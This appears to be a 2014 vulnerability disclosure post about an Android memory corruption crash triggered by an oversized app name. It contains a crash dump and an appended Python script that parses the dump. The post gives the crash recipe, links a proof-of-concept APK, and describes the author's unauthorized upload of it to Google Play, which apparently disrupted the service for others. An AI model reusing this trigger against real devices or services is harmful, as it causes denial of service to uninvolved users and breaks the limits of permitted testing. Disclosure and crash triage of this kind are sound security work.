I've discovered a vulnerability in Android which causes a possible memory corruption.
I think all Android versions are affected by this vulnerability.
I successfully confirmed that it affects Android 4.2.2, 4.3 and 2.3.
I reported the vulnerability to Google Security and my report id is "67213".
Executing a malformed APK file triggers the vulnerability; it causes a DoS and the device becomes frozen.
I really didn't want to cause any damage, but I couldn't stop my feelings and I wanted to test it on Google's Android Bouncer by uploading the malformed APK to Google Play.
Then I realized that it caused a Denial of Service on Google Play,
because I started to get some errors from Google Play!
After some googling, I saw that many people were unable to upload their apps to Google Play during my test!
I think it was probably because of testing my PoC exploit on Google Play.
Here is a short info about the vuln: http://ibrahimbalic.com/2014/android-os-memory-corruption-bug/
The error that I got from Google Play after uploading my PoC exploit:
https://pbs.twimg.com/media/Bi011zvCUAABGo-.png:large

And some people who got the same error during my test:
https://code.google.com/p/android/issues/detail?id=67226&colspec=ID%20Type%20Status%20Owner%20Summary%20Stars#makechanges

P.S. sorry for poor english guys!!!

Android OS Memory Corruption Bug

Update:
THIS VULN CAUSED DoS on GOOGLE PLAY. Nobody could upload an APK for 2 days!! More info:

http://ibrahimbalic.com/2014/android-vulnerability-affected-google-play-bouncer-emulator/

Hi guys,

This week I tried hard on Android (tools and OS) by fuzzing, and I found an Android OS memory corruption bug and an Android Debug Bridge (adb.exe) BOF.

This Android OS bug causes memory corruption and shuts down the Android OS.

I tested on Android 4.2.2, Android 4.3 and Android 2.3; the result seems to be the same on every attempt.

The cause of the bug is the "appname" length: if you set the appname in strings.xml to a very long value (387000+ chars), it triggers the bug.

If you want to test, install this app and run it on your Android device.

download apk


I/DEBUG (12909): pid: 13049, tid: 13079, name: WindowManager >>> system_server <<<
I/DEBUG (12909): signal 11 (SIGSEGV), code 2 (SEGV_ACCERR), fault addr 5fbfe000
I/DEBUG (12909): r0 5fbfdfd8 r1 6584ae58 r2 005ffb80 r3 3acb31c0
I/DEBUG (12909): r4 601fdbf0 r5 5fb771d8 r6 5c6a5af8 r7 5c19ea88
I/DEBUG (12909): r8 00000000 r9 001a1a80 sl 00000000 fp 42375618
I/DEBUG (12909): ip 5fb771d8 sp 5fb77190 lr 401d0613 pc 400f8210 cpsr 20000010
I/DEBUG (12909): d0 4100000041000000 d1 4100000041000000
I/DEBUG (12909): d2 4100000041000000 d3 4100000041000000
I/DEBUG (12909): d4 4100000041000000 d5 4100000041000000
I/DEBUG (12909): d6 4100000041000000 d7 4100000041000000
I/DEBUG (12909): d8 c3a00000c3a00000 d9 3f80000044340000
I/DEBUG (12909): d10 430500003f800000 d11 3fcdd94742960000
I/DEBUG (12909): d12 4000000000000000 d13 3f0000003f3bb28f
I/DEBUG (12909): d14 000000003f3bb28f d15 0000000000000000
I/DEBUG (12909): d16 0000903cb0e16900 d17 7fffffffffffffff
I/DEBUG (12909): d18 0000000000000000 d19 0000000000000000
I/DEBUG (12909): d20 0000000000000000 d21 397377ce858a5d48
I/DEBUG (12909): d22 3fa555555555554c d23 bcb1a62633145c07
I/DEBUG (12909): d24 3fc55546b2662d7e d25 3fefd70a40000000
I/DEBUG (12909): d26 3fd5555c80ffa191 d27 3fdb6dbfa3a1ea05
I/DEBUG (12909): d28 3fe33338d877fab4 d29 bf747ae000000000
I/DEBUG (12909): d30 3fffeb8500000000 d31 0000000000000000
I/DEBUG (12909): scr 60000010
I/DEBUG (12909):
I/DEBUG (12909): backtrace:
I/DEBUG (12909): #00 pc 0000e210 /system/lib/libc.so
I/DEBUG (12909): #01 pc 001a1a7c <unknown>
I/DEBUG (12909):
I/DEBUG (12909): stack:
I/DEBUG (12909): 5fb77150 5c6a5b14
I/DEBUG (12909): 5fb77154 5c6a5b18
I/DEBUG (12909): 5fb77158 5fb771a4
I/DEBUG (12909): 5fb7715c 401d1885 /system/lib/libandroid_runtime.so (android::TextLayoutEngine::getValue(SkPaint const*, unsigned short const*, int, int, int, int)+104)
I/DEBUG (12909): 5fb77160 00000000
I/DEBUG (12909): 5fb77164 001a1a80
I/DEBUG (12909): 5fb77168 001a1a80
I/DEBUG (12909): 5fb7716c 00000000
I/DEBUG (12909): 5fb77170 601fdbf0
I/DEBUG (12909): 5fb77174 5fb771d8
I/DEBUG (12909): 5fb77178 42375618 /dev/ashmem/dalvik-heap (deleted)
I/DEBUG (12909): 5fb7717c 5c19ea88
I/DEBUG (12909): 5fb77180 00000000
I/DEBUG (12909): 5fb77184 001a1a80
I/DEBUG (12909): 5fb77188 df0027ad
I/DEBUG (12909): 5fb7718c 00000000
I/DEBUG (12909): #00 5fb77190 00000000
I/DEBUG (12909): 5fb77194 001a1a80
I/DEBUG (12909): #01 5fb77198 001a1a80
I/DEBUG (12909): 5fb7719c 00000000
I/DEBUG (12909): 5fb771a0 00000000
I/DEBUG (12909): 5fb771a4 5c6a5af8
I/DEBUG (12909): 5fb771a8 00000000
I/DEBUG (12909): 5fb771ac 5d28ec10
I/DEBUG (12909): 5fb771b0 001a1a80
I/DEBUG (12909): 5fb771b4 00000000
I/DEBUG (12909): 5fb771b8 601fdbe0
I/DEBUG (12909): 5fb771bc 00000000
I/DEBUG (12909): 5fb771c0 001a1a80
I/DEBUG (12909): 5fb771c4 401cd64d /system/lib/libandroid_runtime.so
I/DEBUG (12909): 5fb771c8 001a1a80
I/DEBUG (12909): 5fb771cc 00000000
I/DEBUG (12909): 5fb771d0 5fb771d8
I/DEBUG (12909): 5fb771d4 601fdbf0
I/DEBUG (12909):
I/DEBUG (12909): memory near r0:
I/DEBUG (12909): 5fbfdfb8 41000000 41000000 41000000 41000000 ...A...A...A...A
I/DEBUG (12909): 5fbfdfc8 41000000 41000000 41000000 41000000 ...A...A...A...A
I/DEBUG (12909): 5fbfdfd8 41000000 41000000 41000000 41000000 ...A...A...A...A
I/DEBUG (12909): 5fbfdfe8 41000000 41000000 41000000 41000000 ...A...A...A...A
I/DEBUG (12909): 5fbfdff8 41000000 41000000 00000000 00000000 ...A...A........
I/DEBUG (12909):
I/DEBUG (12909): memory near r1:
I/DEBUG (12909): 6584ae38 41000000 41000000 41000000 41000000 ...A...A...A...A
I/DEBUG (12909): 6584ae48 41000000 41000000 41000000 41000000 ...A...A...A...A
I/DEBUG (12909): 6584ae58 41000000 41000000 41000000 41000000 ...A...A...A...A
I/DEBUG (12909): 6584ae68 41000000 41000000 41000000 41000000 ...A...A...A...A
I/DEBUG (12909): 6584ae78 41000000 41000000 41000000 41000000 ...A...A...A...A
I/DEBUG (12909):
I/DEBUG (12909): memory near r2:
I/DEBUG (12909): 005ffb60 ffffffff ffffffff ffffffff ffffffff ................
I/DEBUG (12909): 005ffb70 ffffffff ffffffff ffffffff ffffffff ................
I/DEBUG (12909): 005ffb80 ffffffff ffffffff ffffffff ffffffff ................
I/DEBUG (12909): 005ffb90 ffffffff ffffffff ffffffff ffffffff ................
I/DEBUG (12909): 005ffba0 ffffffff ffffffff ffffffff ffffffff ................
I/DEBUG (12909):
I/DEBUG (12909): memory near r3:
I/DEBUG (12909): 3acb31a0 ffffffff ffffffff ffffffff ffffffff ................
I/DEBUG (12909): 3acb31b0 ffffffff ffffffff ffffffff ffffffff ................
I/DEBUG (12909): 3acb31c0 ffffffff ffffffff ffffffff ffffffff ................
I/DEBUG (12909): 3acb31d0 ffffffff ffffffff ffffffff ffffffff ................
I/DEBUG (12909): 3acb31e0 ffffffff ffffffff ffffffff ffffffff ................
I/DEBUG (12909):
I/DEBUG (12909): memory near r4:
I/DEBUG (12909): 601fdbd0 00000000 407d61a8 42375608 bb700005 .....a}@.V7B..p.
I/DEBUG (12909): 601fdbe0 407d64fc 5fb771d8 4013aa4c 5c19ea88 .d}@.q._L..@...\
I/DEBUG (12909): 601fdbf0 00000000 9477d17e bb700005 5d28ec10 ....~.w...p...(]
I/DEBUG (12909): 601fdc00 42375618 bb700005 5c19ea88 00000000 .V7B..p....\....
I/DEBUG (12909): 601fdc10 00000000 001a1a80 00000000 401cd7cf ...............@
I/DEBUG (12909):
I/DEBUG (12909): memory near r5:
I/DEBUG (12909): 5fb771b8 601fdbe0 00000000 001a1a80 401cd64d ...`........M..@
I/DEBUG (12909): 5fb771c8 001a1a80 00000000 5fb771d8 601fdbf0 .........q._...`
I/DEBUG (12909): 5fb771d8 41000000 41000000 41000000 41000000 ...A...A...A...A
I/DEBUG (12909): 5fb771e8 41000000 41000000 41000000 41000000 ...A...A...A...A
I/DEBUG (12909): 5fb771f8 41000000 41000000 41000000 41000000 ...A...A...A...A
I/DEBUG (12909):
I/DEBUG (12909): memory near r6:
I/DEBUG (12909): 5c6a5ad8 00000000 00000000 00000000 00000000 ................
I/DEBUG (12909): 5c6a5ae8 00000000 00000000 00000000 00000043 ............C...
I/DEBUG (12909): 5c6a5af8 40200e80 5c89c6c0 40200ea0 657c4018 .. @...\.. @.@|e
I/DEBUG (12909): 5c6a5b08 001a1a80 00000007 00000004 4b50d400 ..............PK
I/DEBUG (12909): 5c6a5b18 40200ee8 65e4b018 001a1a80 00000007 .. @...e........
I/DEBUG (12909):
I/DEBUG (12909): memory near r7:
I/DEBUG (12909): 5c19ea68 00000000 00000040 00000010 00000010 ....@...........
I/DEBUG (12909): 5c19ea78 00040006 001e0103 00000038 00000053 ........8...S...
I/DEBUG (12909): 5c19ea88 40b36f80 41600000 3f800000 00000000 .o.@..`A...?....
I/DEBUG (12909): 5c19ea98 00000000 00000000 00000000 00000000 ................
I/DEBUG (12909): 5c19eaa8 00000000 00000000 5c542620 00000000 ........ &T\....
I/DEBUG (12909):
I/DEBUG (12909): memory near r9:
I/DEBUG (12909): 001a1a60 ffffffff ffffffff ffffffff ffffffff ................
I/DEBUG (12909): 001a1a70 ffffffff ffffffff ffffffff ffffffff ................
I/DEBUG (12909): 001a1a80 ffffffff ffffffff ffffffff ffffffff ................
I/DEBUG (12909): 001a1a90 ffffffff ffffffff ffffffff ffffffff ................
I/DEBUG (12909): 001a1aa0 ffffffff ffffffff ffffffff ffffffff ................
I/DEBUG (12909):
I/DEBUG (12909): memory near fp:
I/DEBUG (12909): 423755f8 40c9fc88 00000000 40cbf9f8 0034351b ...@.......@.54.
I/DEBUG (12909): 42375608 40c39928 00000000 001a1a80 00000000 (..@............
I/DEBUG (12909): 42375618 00610061 00610061 00610061 00610061 a.a.a.a.a.a.a.a.
I/DEBUG (12909): 42375628 00610061 00610061 00610061 00610061 a.a.a.a.a.a.a.a.
I/DEBUG (12909): 42375638 00610061 00610061 00610061 00610061 a.a.a.a.a.a.a.a.
I/DEBUG (12909):
I/DEBUG (12909): memory near ip:
I/DEBUG (12909): 5fb771b8 601fdbe0 00000000 001a1a80 401cd64d ...`........M..@
I/DEBUG (12909): 5fb771c8 001a1a80 00000000 5fb771d8 601fdbf0 .........q._...`
I/DEBUG (12909): 5fb771d8 41000000 41000000 41000000 41000000 ...A...A...A...A
I/DEBUG (12909): 5fb771e8 41000000 41000000 41000000 41000000 ...A...A...A...A
I/DEBUG (12909): 5fb771f8 41000000 41000000 41000000 41000000 ...A...A...A...A
I/DEBUG (12909):
I/DEBUG (12909): memory near sp:
I/DEBUG (12909): 5fb77170 601fdbf0 5fb771d8 42375618 5c19ea88 ...`.q._.V7B...\
I/DEBUG (12909): 5fb77180 00000000 001a1a80 df0027ad 00000000 .........'......
I/DEBUG (12909): 5fb77190 00000000 001a1a80 001a1a80 00000000 ................
I/DEBUG (12909): 5fb771a0 00000000 5c6a5af8 00000000 5d28ec10 .....Zj\......(]
I/DEBUG (12909): 5fb771b0 001a1a80 00000000 601fdbe0 00000000 ...........`....
I/DEBUG (12909):
I/DEBUG (12909): code around pc:
I/DEBUG (12909): 400f81f0 f5d1f020 ba000007 f5d1f040 f5d1f060  .......@...`...
I/DEBUG (12909): 400f8200 ecb10b10 f5d1f040 f5d1f060 e2522040 ....@...`...@ R.
I/DEBUG (12909): 400f8210 eca00b10 aafffff9 e2922040 0a00000f ........@ ......
I/DEBUG (12909): 400f8220 e3520008 ba000004 ecb10b02 e2422008 ..R.......... B.
I/DEBUG (12909): 400f8230 e3520008 eca00b02 aafffffa e3120004 ..R.............
I/DEBUG (12909):
I/DEBUG (12909): code around lr:
I/DEBUG (12909): 401d05f0 46339303 980e4601 a8059002 f90ef001 ..3F.F..........
I/DEBUG (12909): 401d0600 b14e9e05 6932b12d 68f14628 f7c60092 ..N.-.2i(F.h....
I/DEBUG (12909): 401d0610 b10cea36 602169f1 f7d8a805 b007fb89 6....i!`........
I/DEBUG (12909): 401d0620 83f0e8bd b087b5f0 460d4616 4604461f .........F.F.F.F
I/DEBUG (12909): 401d0630 ff2af7e8 46222300 0048e88d 9602462b ..*..#"F..H.+F..
I/DEBUG (12909):
I/DEBUG (12909): memory map around fault addr 5fbfe000:
I/DEBUG (12909): 5faff000-5fbfe000
I/DEBUG (12909): 5fbfe000-5fbff000
I/DEBUG (12909): 5fbff000-5fcfe000
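The dump above is raw debuggerd output as logcat prints it. The script below is an added example, not code from the original post: it parses the register lines, the backtrace, the "memory near"/"code around" blocks and the "memory map around fault addr" block, decodes the instruction at pc, and checks whether that instruction's store range reaches into the mapping that contains the fault address. The sample input is an excerpt of the dump above. Two things are my inference rather than anything the post states: the decoding of 0xecb10b10/0xeca00b10 as vldmia r1!, {d0-d7} / vstmia r0!, {d0-d7} (the 64-byte copy loop shape bionic's NEON memcpy uses), and the 4 KiB page size used to size the fault mapping.

```python
import re
import struct
from dataclasses import dataclass, field

# Sample input: an excerpt of the dump above, trimmed to the lines the
# triage needs (registers, backtrace, memory near r0, code around pc, map).
SAMPLE = """\
I/DEBUG (12909): r0 5fbfdfd8 r1 6584ae58 r2 005ffb80 r3 3acb31c0
I/DEBUG (12909): ip 5fb771d8 sp 5fb77190 lr 401d0613 pc 400f8210 cpsr 20000010
I/DEBUG (12909):
I/DEBUG (12909): backtrace:
I/DEBUG (12909): #00 pc 0000e210 /system/lib/libc.so
I/DEBUG (12909): #01 pc 001a1a7c <unknown>
I/DEBUG (12909):
I/DEBUG (12909): memory near r0:
I/DEBUG (12909): 5fbfdfd8 41000000 41000000 41000000 41000000 ...A...A...A...A
I/DEBUG (12909):
I/DEBUG (12909): code around pc:
I/DEBUG (12909): 400f8200 ecb10b10 f5d1f040 f5d1f060 e2522040 ....@...`...@ R.
I/DEBUG (12909): 400f8210 eca00b10 aafffff9 e2922040 0a00000f ........@ ......
I/DEBUG (12909):
I/DEBUG (12909): memory map around fault addr 5fbfe000:
I/DEBUG (12909): 5faff000-5fbfe000
I/DEBUG (12909): 5fbfe000-5fbff000
I/DEBUG (12909): 5fbff000-5fcfe000
"""

PREFIX = re.compile(r"^I/DEBUG\s*\(\d+\):\s?")
REG = re.compile(r"\b(r\d{1,2}|sl|fp|ip|sp|lr|pc|cpsr)\s+([0-9a-f]{8})\b")
FRAME = re.compile(r"^#(\d+)\s+pc\s+([0-9a-f]{8})\s+(\S+)")
DUMP = re.compile(r"^([0-9a-f]{8})((?:\s+[0-9a-f]{8}){1,4})")
NEAR = re.compile(r"^(?:memory near|code around) \w+:")
FAULT = re.compile(r"^memory map around fault addr ([0-9a-f]{8}):")
MAPLINE = re.compile(r"^([0-9a-f]{8})-([0-9a-f]{8})")
# ARM core register names by number, in the spelling debuggerd uses.
REGNAMES = [f"r{i}" for i in range(10)] + ["sl", "fp", "ip", "sp", "lr", "pc"]
PAGE = 4096  # assumption: 4 KiB pages


@dataclass
class Tombstone:
    regs: dict = field(default_factory=dict)    # name -> value
    frames: list = field(default_factory=list)  # (index, pc offset, image)
    words: dict = field(default_factory=dict)   # address -> 32-bit word
    fault_addr: int = 0
    maps: list = field(default_factory=list)    # (start, end)


def parse(text):
    """Walk the dump line by line, switching on the section headers debuggerd emits."""
    ts, section = Tombstone(), "regs"
    for raw in text.splitlines():
        line = PREFIX.sub("", raw).strip()
        if not line:
            continue
        if line in ("backtrace:", "stack:"):
            section = line[:-1]
        elif NEAR.match(line):
            section = "dump"
        elif (m := FAULT.match(line)):
            ts.fault_addr, section = int(m.group(1), 16), "maps"
        elif section == "regs":
            ts.regs.update((n, int(v, 16)) for n, v in REG.findall(line))
        elif section == "backtrace" and (m := FRAME.match(line)):
            ts.frames.append((int(m.group(1)), int(m.group(2), 16), m.group(3)))
        elif section == "dump" and (m := DUMP.match(line)):
            base = int(m.group(1), 16)
            for i, w in enumerate(m.group(2).split()):
                ts.words[base + 4 * i] = int(w, 16)
        elif section == "maps" and (m := MAPLINE.match(line)):
            ts.maps.append((int(m.group(1), 16), int(m.group(2), 16)))
    return ts


def decode_vfp_multi(word):
    """Decode ARM VLDMIA/VSTMIA Rn!, {d..} (double-precision, increment-after,
    writeback). Returns (mnemonic, rn, nbytes) or None for anything else."""
    if (word & 0x0E000F00) != 0x0C000B00:  # coprocessor multi-load/store, 64-bit regs
        return None
    p, u, w, l = (word >> 24) & 1, (word >> 23) & 1, (word >> 21) & 1, (word >> 20) & 1
    if p or not u or not w:                # only the IA-with-writeback form
        return None
    return ("vldmia" if l else "vstmia", (word >> 16) & 0xF, (word & 0xFF) * 4)


def triage(ts):
    """Relate the faulting instruction, its base register and the fault mapping."""
    ins = decode_vfp_multi(ts.words.get(ts.regs["pc"], 0))
    fault_map = next(((s, e) for s, e in ts.maps if s <= ts.fault_addr < e), None)
    finding = {
        "pc_image": ts.frames[0][2] if ts.frames else None,
        "instruction": ins,
        "fault_map": fault_map,
        "fault_map_pages": (fault_map[1] - fault_map[0]) // PAGE if fault_map else 0,
        "store_range": None,
        "store_crosses_fault": False,
    }
    if ins and ins[0] == "vstmia":          # a store through Rn of nbytes
        base = ts.regs[REGNAMES[ins[1]]]
        finding["store_range"] = (base, base + ins[2])
        finding["store_crosses_fault"] = base <= ts.fault_addr < base + ins[2]
    return finding


def words_as_floats(ts, addr, count):
    """Reinterpret consecutive dumped words as little-endian IEEE-754 floats."""
    return [struct.unpack("<f", struct.pack("<I", ts.words[addr + 4 * i]))[0]
            for i in range(count)]
```

Run on the excerpt, `triage(parse(SAMPLE))` reports pc inside /system/lib/libc.so at a vstmia r0!, {d0-d7}, so a 64-byte store starting at r0 = 5fbfdfd8 whose range covers 5fbfe000, and that 5fbfe000 is the start of a single-page mapping wedged between two 0xff000-byte regions. The words already written at r0 decode to the float 8.0 repeated. That layout is what a thread stack and its guard page look like, so the reading is a copy that ran off the end of a stack buffer; the dump does not say so in as many words, so confirm it against the full /proc/PID/maps before relying on it.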